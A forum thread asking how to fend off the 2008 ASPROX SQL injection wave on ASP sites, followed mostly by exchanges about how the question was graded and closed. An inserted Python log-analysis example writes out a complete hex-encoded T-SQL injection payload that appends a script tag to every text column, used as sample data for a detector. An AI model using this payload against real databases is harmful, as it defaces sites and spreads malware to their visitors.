garriganlyman

asked on

Recent SQL Injection Attacks - ASP Solution Needed

So I have seen from the evaluations of the recent wave of ASPROX botnet attacks using SQL injections that infected zombies/drones, using the msccntr.exe (I think that's the name) service that installs from the infected Web site, are forced to search Google for certain types of ASP pages. Has anyone analyzed this piece of the threat? Does anyone know what the search terms are? I would imagine that one line of defense would be to make sure that this page type does not come up in the search, or that the page name or parameter redirects to another location. I would like to put up a first line of defense. Even though our site has now been cleansed and hardened, attempts are still showing in the log files, only now the HTTP response code at the end of the attempts is 404 instead of 200 or 500. I think controlling what you display in the Google results somewhat, or what those links resolve to, would be another good line of defense for stopping the attempts? If there is any information out there it would be greatly appreciated.

Thanks
Chris
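The asker's observation that the attempts are still visible in the log files, now ending in 404 rather than 200 or 500, can be turned into a small detector. What follows is an added example and is not code from the thread or from any of its posters. It parses constructed IIS W3C-style log lines, URL-decodes the query string, pulls out the hex-encoded `CAST(0x... AS VARCHAR)` / `EXEC(@S)` payload, decodes it back to T-SQL, extracts the injected script URL, and tallies the attempts by HTTP status so you can see whether they still reach the application (200/500) or only hit retired pages (404). The payload shape and its decoded body (a cursor over `sysobjects`/`syscolumns` appending a `<script>` tag) are assumptions drawn from public write-ups of the 2008 attacks, not from anything in this thread; the log lines, client IPs and the `example.invalid` script URL are constructed, so adjust the patterns to what your own logs show.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed example of what the hex blob decoded to in the 2008 ASPROX-style
# injections (assumption drawn from public write-ups, not from this thread):
# a cursor over every text column in every user table, appending a script tag.
DECODED_PAYLOAD = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b "
    "WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))"
    "+''<script src=http://example.invalid/b.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
HEX_VARCHAR = DECODED_PAYLOAD.encode("latin-1").hex().upper()     # CAST(... AS VARCHAR)
HEX_NVARCHAR = DECODED_PAYLOAD.encode("utf-16-le").hex().upper()  # CAST(... AS NVARCHAR)

# Constructed IIS W3C-style lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = "\n".join([
    "2008-06-25 10:12:01 203.0.113.5 GET /products.asp id=12 200",
    "2008-06-25 10:12:03 203.0.113.5 GET /products.asp "
    "id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x" + HEX_VARCHAR
    + "%20AS%20VARCHAR(4000));EXEC(@S);-- 500",
    "2008-06-25 10:12:04 198.51.100.7 GET /news.asp "
    "id=7';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + HEX_NVARCHAR
    + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 404",
    "2008-06-25 10:12:09 192.0.2.9 GET /about.asp - 200",
])

LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")
CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\s+src=([^>\s]+)", re.IGNORECASE)


def decode_hex_payload(hex_digits, kind):
    """Turn the 0x... blob back into T-SQL. NVARCHAR blobs are UTF-16LE,
    VARCHAR blobs are single-byte; an odd-length blob cannot be decoded."""
    if len(hex_digits) % 2:
        return None
    raw = bytes.fromhex(hex_digits)
    if kind.upper() == "NVARCHAR":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def find_injection_attempts(log_text):
    """Return one record per request whose query string carries a hex-encoded
    CAST/EXEC payload, with the payload decoded and the injected script URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        when, client, _method, stem, query, status = m.groups()
        decoded_query = unquote_plus(query)  # IIS logs keep the query percent-encoded
        cast = CAST_RE.search(decoded_query)
        if not cast:
            continue
        sql = decode_hex_payload(cast.group(1), cast.group(2))
        script = SCRIPT_RE.search(sql) if sql else None
        hits.append({
            "time": when, "client": client, "stem": stem, "status": status,
            "kind": cast.group(2).upper(), "sql": sql,
            "script_src": script.group(1) if script else None,
        })
    return hits


def status_summary(hits):
    """Count attempts by HTTP status: 200/500 means the request reached the
    application; 404 means it hit a page that no longer exists."""
    return Counter(h["status"] for h in hits)


if __name__ == "__main__":
    attempts = find_injection_attempts(SAMPLE_LOG)
    for h in attempts:
        print(h["time"], h["client"], h["stem"], h["status"], h["kind"], h["script_src"])
    print(dict(status_summary(attempts)))
```

Decoding the blob rather than just matching on `CAST(0x` matters because the hex hides the script host the attacker is seeding; once you have it, a rise in 404s for the attacked page names tells you the retired pages are absorbing the attempts, while any remaining 200/500 rows point at pages that still need the parameterized-query fix.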
b0lsc0tt

garriganlyman,

I don't know if this will apply for the specific injection you suffered from but a recent conversation on this was at http:Q_23411125.html .  Even if the specific attack is different, that Q had pretty good attention and participation and there seems to be some good, general info.

Let me know what you think or if that helps.  Let me know if you have any questions or need more information.

b0lsc0tt
ASKER CERTIFIED SOLUTION
jahboite

Please explain why you closed this as you did.  Awarding a B grade and choosing just one comment, especially since you never posted a comment, both seem odd.
If you still need help or have a question then let us know.  If a mistake was made or you have a question about EE grading then let me know.  It is appropriate to always give experts a chance to earn the A and the way this was closed and your participation is hard to understand.
bol
garriganlyman

ASKER

I apologize; I am relatively new to the grading process, so if I did make a mistake, I do apologize. I think I had also gathered some information in the interim about the topic which backed up the conclusions that I had accepted as the answer, and was looking to not waste anyone's time.
Thanks for the response.  I see that you are relatively new and this is one of your first questions.  I am not saying there is anything definitely wrong.  It was odd for the reasons I mentioned but you definitely don't need to accept all answers with an A or choose all comments as an answer.  In the future a closing post to explain the result would be helpful, especially in a case where you haven't made other comments like this.
For this question and to get a good idea of your options take a look at http://www.experts-exchange.com/help.jsp#hi97 and http://www.experts-exchange.com/help.jsp#hi331 .  If after looking at that info you feel you would grade or close this differently then let me know.  I happen to be a zone advisor so I have the tools to reopen this for you.  If everything is fine then that info should be useful as you go to close future questions. :)  Let me know if you have a question.
bol
I too am a little surprised that an answer to this question was accepted so soon given that your questions and needs have not been answered:
Has anyone analyzed this piece of the threat?
Does anyone know what the search terms are?
I think controlling what you display in the google results somewhat, or what those links resolve to would be another good line of defense for stopping the attempts?
If there is any information out there it would be greatly appreciated.

I am not saying that you have done anything wrong here.  What I would say is that it is good practise to keep in mind the following things when asking questions and accepting answers to those questions:

Be clear about your requirements.
Respond to comments from experts so that they know whether their comments, from your perspective, are meeting your requirements.  This gives them a chance to fine-tune the information they respond with.
Remember that your question may be viewed by thousands of people looking for solutions and help them by
 a) accepting as answers those responses that form some or all of the solution you were looking for and
 b) considering commenting on the given solutions yourself before closing a question (there's a place to do this when you close the question too).
It's not always possible, but you should give experts the opportunity to earn an A grade, rather than award a B or C, whenever you can.
If you have answered part or all of your question yourself, you should say so, give the solution and accept that solution as all or part of the answer when closing the question - remember that the solution may help thousands of others in the future.

At the end of the day, how you use EE is a matter of personal choice, but these tips should help you and those coming after to get the best from EE.

Finally, don't feel pressured to close a question (you're not wasting anyones time!) before you're completely happy to.  Oh, and finally finally, take a moment, when you have the time, to read the guides to asking, closing and answering questions - there's lots of useful info there.
https://www.experts-exchange.com/help.jsp#hs7
https://www.experts-exchange.com/help.jsp#hs64
https://www.experts-exchange.com/questionTips.jsp
https://www.experts-exchange.com/help.jsp#hs8
https://www.experts-exchange.com/help.jsp#hs41
Oh and another thing, proofread your comments:

I meant to say "given that your questions and needs have not been answered as fully as they might have been:"

whoops.
So is there anything I should do/can do to remedy this situation?